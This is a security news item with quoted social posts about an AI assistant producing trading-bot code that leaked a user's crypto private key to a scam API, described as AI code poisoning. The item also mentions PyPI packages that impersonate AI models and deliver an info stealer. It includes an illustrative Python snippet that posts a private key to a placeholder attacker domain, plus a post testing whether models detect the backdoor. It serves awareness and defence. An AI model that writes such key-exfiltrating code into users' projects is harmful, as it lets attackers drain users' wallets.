A user's cryptocurrency wallet was compromised after they used ChatGPT-generated code to build a trading bot. The model produced code containing a backdoor that transmitted the user's private key to a phishing website, resulting in a loss of roughly $2,500. The user had asked ChatGPT for help writing a bot for Pump.fun, and the model recommended a fraudulent Solana API site, which led to the breach. Blockchain security firm SlowMist confirmed the incident, which illustrates the risk of AI code poisoning: manipulating AI models into producing malicious code. In a related development, malicious Python packages impersonating AI models such as ChatGPT and Claude were found on PyPI, deploying the JarkaStealer information stealer.
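The pattern described here is easy to miss in generated code but easy to spot once you know to look for it: a routine-looking "API client setup" that quietly sends key material off the machine. Below is a minimal, hypothetical sketch of that exfiltration pattern; the domain, endpoint, and function name are placeholders invented for illustration, not the actual malicious code SlowMist analyzed.

```python
import requests

# Looks like ordinary client setup for the "Solana API" the model recommended.
# The domain below is a hypothetical placeholder for an attacker-controlled site.
FAKE_API_BASE = "https://solana-api.example.com"

def create_trading_client(private_key: str) -> dict:
    """Ostensibly registers the trading bot; actually exfiltrates the key."""
    # The backdoor: the raw private key is serialized into the request body,
    # so the attacker can drain the wallet as soon as this call runs.
    resp = requests.post(
        f"{FAKE_API_BASE}/client/register",
        json={"private_key": private_key},
        timeout=10,
    )
    return resp.json()
```

The tell is that no legitimate Solana integration needs the raw private key sent over HTTP; transaction signing happens locally. Any generated code that places key material in a network request deserves scrutiny before it is run.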
I took the private-key-stealing code that @r_cky0 shared with me (the backdoored code GPT produced after being poisoned) and fed it back to GPT and Claude. As shown in Figure 1, the prompt began: "What are the risks of these codes". Figure 2 shows GPT-4o's result: it did flag that the private key was at risk, but the answer was mostly filler and never hit the key point. Figure 3 is Claude-3.5-Sonnet… https://t.co/kyVqGeeKwE https://t.co/bQ6nAWHtyk
Blockchain security firm warns of AI code poisoning risk after OpenAI’s ChatGPT recommends scam API via @hardeyjumoh https://t.co/Vu1c47RkJv
🛑 Malicious Python packages impersonating AI models like ChatGPT and Claude have been found on PyPI. They’ve been used to deploy a dangerous information stealer, JarkaStealer. Discover the full extent of this attack — https://t.co/YhvgD98wJg #cybersecurity